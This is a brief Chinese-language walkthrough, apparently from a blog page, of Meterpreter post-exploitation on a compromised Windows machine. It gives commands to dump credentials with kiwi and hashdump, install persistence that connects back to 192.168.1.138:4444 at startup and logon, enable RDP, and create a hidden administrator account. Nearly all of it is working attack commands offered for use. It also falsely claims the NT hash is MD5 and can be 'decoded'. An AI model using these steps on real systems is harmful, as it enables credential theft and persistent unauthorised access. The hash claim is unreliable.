赞
踩
1.load kiwi 进入kiwi
2.creds_all 得到密码

run hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
最后的32ed87bdb5fdc5e9cba88547376818d4是密码用MD5解码
run persistence -S -U -X -i 3 -p 4444 -r 192.168.1.138
-S:系统启动时加载、-U:用户登陆时加载、-X:开机时自动加载、-i:回连的时间间隔、-r:电脑IP

run post/windows/manage/enable_rdp

netstat查看开放的端口 发现3389以开启

shell 加入shell
chcp 65001 取消乱码
net user zx zx /add 创建 zx 密码 zx

net localgroup Adminstrators zx /add 加入Administrators这个组

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。